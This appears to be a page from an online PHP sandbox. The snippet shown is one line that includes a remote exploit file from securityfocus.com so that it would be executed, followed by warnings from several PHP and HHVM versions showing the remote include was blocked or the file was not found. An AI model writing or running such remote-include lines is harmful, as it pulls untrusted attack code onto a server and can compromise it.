run code in 150+ php & hhvm versions
Bugs & Features
<?php include("http://downloads.securityfocus.com/vulnerabilities/exploits/53388.php"); ?>
Output for 5.3.0 - 5.6.21, 7.0.0 - 7.1.0RC3
Warning: include(): http:// wrapper is disabled in the server configuration by allow_url_include=0 in /in/5Yfs2 on line 2 Warning: include(http://downloads.securityfocus.com/vulnerabilities/exploits/53388.php): failed to open stream: no suitable wrapper could be found in /in/5Yfs2 on line 2 Warning: include(): Failed opening 'http://downloads.securityfocus.com/vulnerabilities/exploits/53388.php' for inclusion (include_path='.:') in /in/5Yfs2 on line 2
Output for hhvm-3.10.0 - 3.12.0
Warning: File not found: http://downloads.securityfocus.com/vulnerabilities/exploits/53388.php in /in/5Yfs2 on line 2